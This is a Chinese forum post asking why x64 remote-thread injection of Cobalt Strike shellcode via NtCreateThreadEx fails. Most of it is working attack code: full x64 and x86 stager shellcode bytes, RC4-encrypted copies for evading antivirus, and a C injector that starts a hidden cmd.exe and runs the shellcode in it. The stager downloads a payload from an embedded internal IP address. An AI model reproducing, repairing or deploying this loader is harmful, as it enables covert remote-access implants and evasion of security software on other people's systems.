-
-
未解决 x64下NtCreateThreadEx远程线程注入shellcode失败
-
发表于: 2021-3-26 18:14 4486
-
问题:
x64下创建进程,使用NtAllocateVirtualMemory
,NtWriteVirtualMemory
,NtCreateThreadEx
进行远程线程注入shellcode失败,报错信息如下
但是 shellcode 提前进行RC4加密然后解密注入就可以正常注入
另外 x64 编译的代码无论是否加密在 win10 下都无法运行,x86 就可以,这里win10 是有特殊保护吗?希望有大佬能帮忙解答下,感激不尽!
环境:
shellcode 是 cobalt strike 生成的
win10 x64 + vs2015 非静态编译
测试机是 server2012 r2 x64
代码如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 | #include "stdafx.h" #include <Windows.h> #include <winternl.h> #ifdef _M_X64 #define CMD L"c:\\windows\\system32\\cmd.exe" / / 原 shellcode #define SHELLCODE_C "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x9a\x1f\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x7a\x47\x36\x66\x00\xce\x01\x80\x3c\x44\x6d\x6f\xb7\x08\x6e\x92\xb7\xb0\x2f\x89\xc2\x9e\xec\x65\x8e\xec\xe2\x1b\x86\x11\x80\x3f\xe6\x12\xf2\x6f\x1a\x54\x10\x3d\xbd\x7f\x00\x4d\xa4\xd2\x7a\x6d\xe0\xec\x9d\x4a\xbc\xe9\xc2\xda\xcd\x21\xb1\x9b\x7c\xe7\x8b\x04\xa0\x41\x1f\x40\x41\x09\x7b\xb4\x2d\x98\x92\xc0\x62\x5f\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x4e\x4c\x4e\x4c\x29\x0d\x0a\x00\xab\x02\x99\xd0\x20\x2e\x5a\x96\x4b\x0e\xf7\x2c\x25\xb3\xa2\xf0\x70\xbb\x02\x2e\xf8\xa0\x6b\x68\x09\x16\x90\xd3\xad\xd8\xbf\x23\x16\xda\x23\x45\xdd\x98\x8a\x38\x67\x7a\xa6\xfc\x3a\x5c\x05\xdf\xce\xe7\x8f\xc6\xce\x92\x27\x06\x81\xca\x3b\x83\x5e\xbb\x6a\x0f\x75\xad\xc4\x8f\x3f\x8d\x8a\x36\x5c\x03\x8f\x69\xe9\xee\x5e\x5a\x7c\x9b\xef\xee\x75\x93\x3a\xb3\x0d\xd6\x9d\x69\x31\x83\xd8\x27\xec\x15\xf2\xf1\xed\xd7\xe7\x19\xde\xeb\x45\x5f\xa6\xc6\xd0\x88\x3f\xda\x88\x43\x22\x0b\x08\x2c\x03\x08\x0f\xef\x31\x70\xa2\xb4\x19\xd9\x82\x59\x3c\x94\x43\x00\x3b\xc2\xf4\xea\xd9\xba\x42\x30\x73\xdf\x0c\xba\x40\x03\x99\xb8\x2d\x91\x57\x93\xf0\x35\x0e\x72\x6b\x29\x3f\xd2\x8e\xba\xa9\x83\x2e\x72\xdf\x8a\x92\x6d\x48\xe9\x1f\x0f\xc1\x6b\xf8\xeb\xb0\x14\x64\x48\x96\xba\xe2\xfb\x6d\x7a\x04\x92\xe6\xf6\x93\x03\xf2\x68\x54\xf6\x4c\xd4\xa4\x57\x0e\x89\x44\xc1\xce\xfc\xb7\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x30\x2e\x30\x2e\x32\x34\x2e\x32\x35\x31\x00\x12\x34\x56\x78" / / RC4加密 shellcode #define SHELLCODE_C_E "\x45\x8e\x0b\x2a\x99\xca\x0e\x92\x5a\xf1\xe9\x8b\xb3\xfa\x21\x30\xec\xfb\xda\xd1\xee\x1d\x94\x95\xca\xb2\xf6\x99\x0d\x83\xb6\xfa\x0c\x5d\x20\x97\xec\xcf\x6a\xbc\x58\x3b\x2d\x2d\x2c\xda\xb2\x27\x62\x15\x76\x9c\x03\x25\x9c\x7a\x5d\x91\x25\x37\x2a\x28\x2c\xa0\x57\x7d\x0b\xa9\x0e\x38\xa2\xc0\x1d\x08\x9c\x2b\x32\x85\x2d\x92\x94\x9f\xeb\x7b\x68\xb5\x3c\x7b\xdf\x86\x68\xa4\x0c\x42\xda\x99\x01\x27\x4c\xba\x7c\x1b\x58\x62\x8a\x4f\xc6\xba\x77\x83\x6a\x9e\x5e\xff\xbc\xc1\xa7\x38\x24\x7e\xdb\xcb\xa1\xad\x1d\x19\x15\x79\x70\xaa\x7a\xd7\x86\xbd\xe2\x50\x9d\xae\xc1\x04\xfa\xdc\x21\xa0\x9f\x55\x35\x80\x84\x32\x31\x01\xf1\x7e\xdd\x75\x6c\xfa\xf1\xf6\xe5\x14\x92\x70\x4c\x98\xb8\x9b\x46\x39\xd4\x3c\x5a\x04\xb0\xa2\xb1\x46\x84\x76\xfa\x11\xe3\xad\x07\x57\x60\x78\xa4\xa2\xf2\x2c\xbb\x60\xa6\x47\x01\x51\xd4\xe6\xac\x09\xbd\xa3\xbb\xf2\x36\xc7\xcc\xa6\x84\x72\xaf\xab\x86\x59\xc4\xa3\xc9\x57\x10\x7c\x42\x5e\x8c\x05\xd9\x2f\x2c\xc2\xdf\xed\xb4\x63\x2f\xa2\x9d\x76\xe8\x0d\x5e\x84\xa1\x12\x9e\x69\xd8\x5c\xcd\x87\x55\x98\x36\x69\xce\x9c\xa2\xae\x1c\xe0\xd5\x9e\x49\xa5\x09\x95\xce\xfc\xdf\x74\x2c\x39\x86\x5b\x8f\x65\x62\x7b\x62\x4b\xa9\xb8\xfa\x91\x4c\x04\x87\x8e\x7d\xf7\xd9\x2e\xef\xe5\x21\x95\x26\xb6\x3e\xb8\xb9\x13\x52\x75\x5c\x55\x83\xc8\x94\x69\x22\xc4\xfe\x5c\xbf\xc4\x8d\x07\xd9\x6a\xfa\x65\x7c\x87\x0a\x05\x3e\x12\x06\x15\x8c\xc2\x42\xd2\x4f\x90\xee\x9a\x3b\x08\xea\x29\x7a\xe7\x5c\x29\xdf\xe1\x11\xfb\xc1\x7a\xdc\xde\x36\x1d\x21\xd6\x26\xa7\xaa\x9d\x3e\xe8\x7c\xe5\x38\x49\x83\xba\x2f\xd7\x33\x66\x59\x56\xea\x36\x11\xef\x8b\xf0\xfa\x4a\x61\xf6\x03\x14\xb1\x87\x83\x65\xe2\x3d\x75\x2f\x2c\x45\x23\x1c\xa9\x8a\x0c\xfb\xad\xf2\x09\x24\x71\x35\xcd\x42\x0f\xce\x52\x28\xf3\xdc\x99\xb0\x35\xad\x41\x69\xb5\xee\x3e\x8a\x7a\x8f\xbc\x14\x40\xdb\x4f\xd0\x28\xc8\x4a\xe1\x80\x1e\x17\xd7\xcc\x7b\x88\xc1\x91\x92\xf4\xde\x89\x6a\x90\x6a\xa5\x6d\x68\x32\xe7\x23\x3c\x1e\xd0\x87\xc2\x29\xa3\xec\x70\x58\xf7\x03\x7e\x87\x30\xc5\x43\x5d\xc7\xd5\x72\xd0\x69\x51\x75\xa4\xd5\x7e\x4f\x5d\x51\xd4\xae\xb9\xbe\x4b\xeb\x1f\x3c\xf7\xf4\x86\xfe\x06\x98\x6c\xed\xaf\x43\x3e\x81\xf8\x6f\x7d\x47\x94\xa3\xab\x8e\xcb\xe0\x3f\xaa\xed\xc8\xa6\x12\xbb\xc3\x77\xf3\xc8\x52\x3b\x26\x0a\x3b\x66\xac\x38\x2c\xb9\x0a\xdc\xfd\xed\xa4\x86\x10\x1d\xd2\x23\xd5\xba\x4a\x68\x74\x1f\xf1\xbe\x96\x0a\x23\xb0\xe2\x9c\x8f\xf2\x51\x18\xf1\x28\x09\xe1\x6e\xf7\x79\x4d\xa5\x2b\xd6\x7e\x03\x82\x23\xe3\x24\x88\x10\x02\x20\x3e\x2c\x68\x50\x56\x12\x7f\x1c\x5c\xa2\xf9\x0c\x31\x40\xbc\x8c\x91\x02\x25\xc9\x68\x26\xc2\x62\x64\x4a\x98\x57\xfb\xe1\x18\x18\x17\xd3\x73\x0c\x07\xb8\x7c\xfd\x6d\x6a\x3c\x94\x74\xf3\x30\x0d\x16\x5b\xc5\x9e\xa8\x0d\x90\x46\x05\x8f\xda\xd1\xc8\x17\x14\x09\xc9\xb9\x30\x4d\x69\x6b\x4a\x29\xda\xbf\x09\x27\xf2\xa5\xc4\xff\x47\x91\xa4\x1c\xe0\x87\x27\xcd\x85\x08\x29\xcc\x29\x63\x1d\x23\xcb\x91\x8a\x52\x09\x79\xb1\x34\xdd\x5c\x3f\xa4\x68\xd9\x72\xdd\xd5\x83\x5b\x67\x71\xc0\xcc\xff\xc1\x0e\x7b\xd7\xbd\x1f\x91\x44\x6c\xf0\x56\x59\x0c\xcb\x0f\x0a\xd6\x42\xc5\xa8\x6c\x74\xfb\xa4\x98\x59\x5e\xa6\x6a\x7a\x24\x6c\x28\x5c\xc1\xb3\x9b\x57\xd1\x1a\x06\x14\x13\x7e\x23\x79\x10\x17\xa9\x9b\xac\x4f\x50\x75\x8c\xf0\xe5\x32\xbf\xee\x1f\x87\xb6\x4e\xc4\x3a\x33\xe1\x7c\xff\x10\x7e\xd8\x75\x2c\x13\x75\x55\x48\xa1\xd3\x50\x43\x10\x7f\x55\x41\x3c\xe4\xf2\x5d\x55\xd9\x99\x3b\x99\x39\x40\xf7\xa2\x7b\x99\x4e\x06\xe3\xde\xb5\x86\xcc\xa9\xf7\xda\x41\x49\xeb\xe8\x8e\x6b\xc4\x48\x57\x63\xd3\xae\x90\x97\x25\x90\x5e\x7c\xd9\x3b\x66\x0f\x4b\x2d\xdd\xea\x52\x75\x5f\xe5\x02\xd4\x88\x9d\x5b\xaa\x67\x90\xfb\x07\x43\x3d\xf6\xf2\x4d\x97\x6c\xbe\xcd\x4c\x96\xf0\x45\x9d\xc1\x2c\xbf\xcf\x46\xfc\x53\x46\xed\x33\x49" #else #define CMD L"c:\\windows\\syswow64\\cmd.exe" #define SHELLCODE_C "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x9a\x1f\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x36\x78\x58\x56\x00\xee\x6b\xfa\x21\x74\xa6\x7e\xd1\x75\x2f\x63\x97\xd9\xf8\x2b\xf6\xc3\x50\xb3\x40\x41\x07\xc6\x22\x3d\x9d\x1a\x78\x40\x6e\x98\x97\x89\x41\x38\xce\x2e\x9c\x45\xf9\xb0\x03\x4d\xc2\x59\x1b\x21\x60\x29\xa6\x81\x43\x87\xd6\xf8\x6e\xa0\xa0\x1b\xb6\x59\x01\xfe\x63\x9a\x4c\x98\x5d\x7c\xb0\x46\xcd\xd8\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x29\x0d\x0a\x00\x8b\x64\x12\x4e\xce\x87\x38\x2e\xf5\xde\xb7\xb6\x2a\x4a\x5e\xdb\xb0\x8e\x21\x00\xb8\x52\x98\xdb\xdb\x08\x79\x4e\xb4\x9c\x32\x7c\xe2\x44\xbd\x42\x9a\x42\x93\x7b\xfc\x05\x1c\x3d\xe3\xf1\x82\x00\xad\x8b\x62\x30\xa3\x8f\xe5\x5b\xee\x97\xe9\xbc\x50\x2d\x5b\xbd\x47\x89\xbc\xac\xf5\x1e\x8b\x0b\x61\x3c\x4a\x9a\x0b\x9e\x3e\xe8\x9a\x98\x3d\x38\x65\x4f\xa4\x7f\x1e\xfa\xd3\xe9\x87\x95\xdb\x97\xcc\x6d\x52\x5f\x03\x5b\xe6\x48\xfc\x79\x59\x8f\x3d\x38\x32\x45\x45\x0e\x5f\x5d\x34\x8a\x15\xe5\x5b\x3a\x25\x22\xa7\x43\x2b\x50\xb4\x54\x7d\x68\xa4\x55\xac\x0a\x1e\xc6\xf5\xcb\x23\x88\x73\xf7\xce\x81\x4e\xfc\x88\xf0\x1c\xa0\x13\x75\x9f\x77\x9c\x82\xdb\x90\xfb\xee\x44\xe1\x3f\x98\xd1\x9f\xf7\x27\x39\xa6\xb8\x9c\xc9\xaf\x76\x86\x59\x75\x97\xdc\xc9\xb6\xad\x9d\xeb\x00\x43\x51\xbf\x51\xe2\x6a\x61\xc2\x7a\x7c\xac\x9e\x37\xe3\x0d\xb6\xb6\xe6\xc3\xf3\x7f\x26\xa7\x2e\x7a\x63\xce\xf5\x38\xb0\xdf\x90\xf7\x35\x78\xe0\xcc\x8b\x46\xf1\x5e\x00\xf9\x8a\xdd\x8c\x5f\xf8\x58\x8a\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x30\x2e\x30\x2e\x32\x34\x2e\x32\x35\x31\x00\x12\x34\x56\x78" #define SHELLCODE_C_E "\x45\x2e\x01\xce\x69\x22\xa6\x1b\xbf\xc0\x7a\xbe\x79\xf8\x43\xea\xe8\xbf\x60\x51\x9f\xde\x6d\xef\xa5\x4d\x37\xed\x24\x34\x0c\x68\x80\x29\xca\x99\xbe\xab\x45\xca\xdd\x7c\x61\xdb\x07\x62\xd1\xb0\x45\x7b\x07\x6b\x43\x35\xbd\xeb\x17\x18\x50\xf3\xeb\x9d\x84\x4c\xd5\x6c\xd1\xa9\x9d\xe1\xda\x6b\x5e\xe7\x37\x16\xab\x68\x98\x61\x8d\x42\xd8\xf1\x2b\xfe\x10\x32\x10\x8b\x69\x2b\xb1\x62\xdb\x0a\x4a\x5b\x64\xd1\x8a\x77\x35\xc4\x59\x84\xbe\xd7\x77\x80\xef\x43\x1a\x4b\xfe\xd8\x30\x0d\x7f\xbd\xde\x96\xed\x4c\x5d\x15\x00\x9d\x87\xb0\xda\x47\xd1\xad\x1c\x71\xfd\x11\xee\x7e\xa4\x34\xeb\xd9\xff\x7e\x69\x25\xf1\x82\x1e\x2c\x14\x57\xad\x54\x21\x5d\xb1\xb0\x91\xcd\xeb\xcb\x90\x8f\xf3\x85\x10\x81\xaf\xe1\x27\x2b\x07\x76\x88\x83\xdc\x37\xa2\x14\x8b\x3e\x17\x5e\x4b\x22\xb4\xa9\xd2\x35\x48\x40\xe7\x46\xae\xd9\xdb\x2e\x6a\x95\x0a\xfd\x42\x6b\x22\x09\xe1\x0b\xb1\x18\xad\xa2\xbc\x7c\xff\x9f\xf3\x6b\x25\x60\xa9\x4a\xf4\x77\xaf\x1c\xe9\x8d\xad\x6f\x5e\x1e\xa7\xd3\xcd\xe3\xc2\x16\x39\x25\xc4\x25\x54\x5f\x16\x49\x05\x76\x93\x5d\xa5\x29\x9e\xdd\x29\x6b\xcf\x6f\x06\x65\x15\xb7\x91\xc6\xee\xdf\xdb\xd7\xc9\x5c\x4c\xd2\x4e\x40\x16\x93\x7d\x2b\x17\x3c\xa1\x6d\x5a\x3f\xc1\x65\x7c\x2e\x2e\x5f\x47\xd0\xc1\x33\xa8\x41\xb7\x56\xf1\x22\xb9\xfb\xa1\x3a\xff\x06\xb4\xaa\x4b\xc4\xfc\xf5\xf2\x97\xdf\x46\x8b\x0a\x50\xb4\xb8\x57\xe9\x35\xef\x82\x4e\x78\x24\x68\x09\xac\xb6\xa6\xb6\x1e\x5c\xe2\xa7\xb9\x45\x0c\x55\x15\x70\xad\x1c\x8b\x0f\xee\xac\xa2\x11\x2a\x5f\x8e\x33\xc0\xe8\x91\xbf\xdf\x37\x56\xa5\x0c\x7a\x42\xd3\x55\xfe\xbb\xce\x76\x8a\x1f\x5c\xbd\x21\x93\x2d\xb2\x0f\xbe\x01\xf0\xf8\x21\xad\xe1\xc6\x91\x5f\xb7\xbf\x38\x13\x66\x20\x3f\x63\x19\xd6\xf9\xe9\xbe\x80\x7d\x21\xee\xe5\x18\x17\xeb\x70\x44\xeb\x5a\x48\x4c\x51\xbb\x89\x2c\x71\xb8\x4d\xf0\xec\xd9\x5e\xaf\x6b\x16\x96\xd7\x1c\x21\x21\xd0\x14\x2e\x05\x81\x7c\x3c\x8b\x03\x38\xcb\x00\x85\xfb\xbd\x97\x52\x66\x27\xce\x6e\xa6\x02\x61\x18\x08\x4b\x77\x88\x37\x65\x5c\xf6\x6b\xe8\xa2\x7e\x9a\x9f\xd7\xbf\x61\x64\xa3\xb6\x38\xc8\x0c\x03\xe2\xa8\xba\xfc\xff\x94\x65\xba\xa9\x02\xaa\xda\x2b\xa8\x01\x7f\x2b\x5a\x42\xe3\x1a\x23\x5b\x27\xdd\x46\xca\x48\xa8\xf5\x49\x2b\x72\x17\x64\x34\x75\x3a\x74\xb8\xa9\xf1\x94\x15\x9c\xfe\xb7\x71\xde\x19\xe2\x31\x48\x13\x3a\x62\x81\x4a\x77\x5b\x14\x1e\xf9\x20\x3f\x89\x7d\x9f\xad\xf6\xdd\x29\xd4\x4d\xcf\xf3\xea\x55\xc7\xa7\x40\x7c\x28\xe2\xf2\x9e\x23\x74\x49\x26\x18\x85\xe2\x4b\x3e\x1e\xa6\xd5\xd2\x6a\x8a\x03\x91\xa7\x24\x7d\x39\x9a\xe5\x2f\xdf\x73\xa8\x0f\x28\xab\xb0\xa8\x61\xfe\xfe\x14\xc9\x7b\x4f\x38\x6b\x5e\x6d\xbb\x1a\x35\x14\x60\xf1\x38\xcc\x6c\xc8\x64\x76\xab\x9e\xf6\x34\xca\x8a\xbd\x94\xcc\xc9\x11\x7d\x84\x9d\xbd\x6e\x56\xdc\x0f\xdb\x05\x4d\xd6\x24\x33\xa6\x8d\xf4\x90\x42\xd4\xed\x91\x8d\x4d\x56\xc8\xb6\xd7\x78\xfa\x76\x7b\xda\x14\x41\xcd\x28\x25\xb4\xee\xc9\x33\xc5\xe9\x1e\x39\xcd\x27\x6b\x33\xa2\x16\x7c\x40\x51\x1f\x51\x5f\xa0\x5e\xc4\xba\xf6\x80\x8f\x89\xd7\xc7\xfb\x22\x2d\x85\x33\xa8\x4f\x88\x01\xe3\x2f\x2d\xcf\x84\x97\xb6\x35\xe4\x7c\x00\xce\xaa\xc5\xd4\xaf\xab\xbb\x97\x98\x35\x5f\x58\x9b\x63\x81\x87\x9d\x13\x51\x40\x3a\xab\x4d\xc2\x9a\xf7\x7b\xa9\x69\x87\x96\xda\x17\x0c\x2d\x8c\x7c\x04\x77\xa1\x3c\x36\xbc\x47\x05\xe0\x17\x8c\x67\x9a\x2f\x99\x99\x11\x99\x50\x41\x02\x61\x40\x25\xf0\xb3\xf7\x06\x3b" #endif #define KEY "20@10315" typedef NTSTATUS(NTAPI * TNtAllocateVirtualMemory)( / / 定义 NtAllocateVirtualMemory 原型 HANDLE ProcessHandle, PVOID * BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); TNtAllocateVirtualMemory NtAllocateVirtualMemory = NULL; typedef NTSTATUS(NTAPI * TNtWriteVirtualMemory)( / / 定义 NtWriteVirtualMemory 原型 HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer , ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten OPTIONAL); TNtWriteVirtualMemory NtWriteVirtualMemory = NULL; typedef NTSTATUS(NTAPI * TNtCreateThreadEx)( / / 定义 NtCreateThreadEx 原型 PHANDLE hThread, ACCESS_MASK DesiredAccess, PVOID ObjectAttributes, HANDLE ProcessHandle, PVOID lpStartAddress, PVOID lpParameter, ULONG Flags, SIZE_T StackZeroBits, SIZE_T SizeOfStackCommit, SIZE_T SizeOfStackReserve, PVOID lpBytesBuffer); TNtCreateThreadEx NtCreateThreadEx = NULL; void RC4Crypt(unsigned char Data[], unsigned long Length, unsigned char Key[], unsigned long KeyLength) / / rc4 加密 { int i = 0 , j = 0 ; unsigned char k[ 256 ] = { 0 }, s[ 256 ] = { 0 }; unsigned char tmp = 0 ; for (i = 0 ; i < 256 ; i + + ) { s[i] = i; k[i] = Key[i % KeyLength]; } for (i = 0 ; i < 256 ; i + + ) { j = (j + s[i] + k[i]) % 256 ; tmp = s[i]; s[i] = s[j]; s[j] = tmp; } int t = 0 ; i = 0 , j = 0 , tmp = 0 ; unsigned long l = 0 ; for (l = 0 ; l < Length; l + + ) { i = (i + 1 ) % 256 ; j = (j + s[i]) % 256 ; tmp = s[i]; s[i] = s[j]; s[j] = tmp; t = (s[i] + s[j]) % 256 ; Data[l] ^ = s[t]; } } int main() { unsigned char buf[] = SHELLCODE_C; unsigned char key[] = KEY; / / RC4Crypt(buf, sizeof buf, key, sizeof key); HMODULE hNtdll = LoadLibraryW(L "ntdll" ); NtAllocateVirtualMemory = (TNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory" ); NtWriteVirtualMemory = (TNtWriteVirtualMemory)GetProcAddress(hNtdll, "NtWriteVirtualMemory" ); NtCreateThreadEx = (TNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx" ); PROCESS_INFORMATION ProcessInfo; STARTUPINFO StartupInfo; ZeroMemory(&StartupInfo, sizeof(StartupInfo)); ZeroMemory(&ProcessInfo, sizeof(ProcessInfo)); StartupInfo.cb = sizeof(StartupInfo); if (!CreateProcess( CMD, NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &StartupInfo, &ProcessInfo )) { exit( - 1 ); } WaitForSingleObject(ProcessInfo.hProcess, 1000 ); HANDLE thread_handle, target_process_handle; HANDLE remote_thread_handle; LPVOID remote_process_buffer = NULL; unsigned int buf_len = sizeof(buf); / / 分配内存 NtAllocateVirtualMemory(ProcessInfo.hProcess, &remote_process_buffer, 0 , (PSIZE_T)&buf_len, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); / / 写 shellcode NtWriteVirtualMemory(ProcessInfo.hProcess, remote_process_buffer, buf, buf_len, NULL); / / 创建远程线程 NtCreateThreadEx(&thread_handle, 0x1FFFFF , NULL, ProcessInfo.hProcess, (LPTHREAD_START_ROUTINE)remote_process_buffer, NULL, FALSE, NULL, NULL, NULL, NULL); return 0 ; } |
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
赞赏
看原图
赞赏
雪币:
留言: